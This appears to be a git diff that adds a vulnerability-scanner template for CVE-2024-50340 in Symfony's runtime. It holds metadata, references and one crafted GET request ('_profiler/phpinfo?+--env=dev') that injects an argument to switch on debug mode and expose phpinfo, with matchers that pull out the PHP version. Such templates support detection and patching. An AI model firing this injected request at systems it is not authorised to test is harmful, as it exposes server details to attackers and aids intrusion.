diff --git a/http/cves/2024/CVE-2024-50340.yaml b/http/cves/2024/CVE-2024-50340.yaml new file mode 100644 index 0000000000..31fdbdc2c9 --- /dev/null +++ b/http/cves/2024/CVE-2024-50340.yaml @@ -0,0 +1,52 @@ +id: CVE-2024-50340 + +info: + name: Remote Access to Symfony Profiler via Injected Arguments + author: DhiyaneshDK + severity: high + description: | + symfony/runtime is a module for the Symphony PHP framework which enables decoupling PHP applications from global state. When the `register_argv_argc` php directive is set to `on` , and users call any URL with a special crafted query string, they are able to change the environment or debug mode used by the kernel when handling the request. As of versions 5.4.46, 6.4.14, and 7.1.7 the `SymfonyRuntime` now ignores the `argv` values for non-SAPI PHP runtimes. + remediation: All users are advised to upgrade. There are no known workarounds for this vulnerability. + reference: + - https://github.com/symfony/symfony/commit/a77b308c3f179ed7c8a8bc295f82b2d6ee3493fa + - https://github.com/symfony/symfony/security/advisories/GHSA-x8vp-gf4q-mw5j + - https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7 + - https://github.com/nollium/CVE-2024-50340-eos-exploit + - https://nvd.nist.gov/vuln/detail/CVE-2024-50340 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: CVE-2024-50340 + cwe-id: CWE-74 + epss-score: 0.00043 + epss-percentile: 0.10043 + metadata: + verified: true + max-request: 1 + fofa-query: 'body="
" || header="Set-Cookie: symfony"' + tags: cve,cve2024,symfony,php + +http: + - method: GET + path: + - "{{BaseURL}}/_profiler/phpinfo?+--env=dev" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "PHP Extension" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)'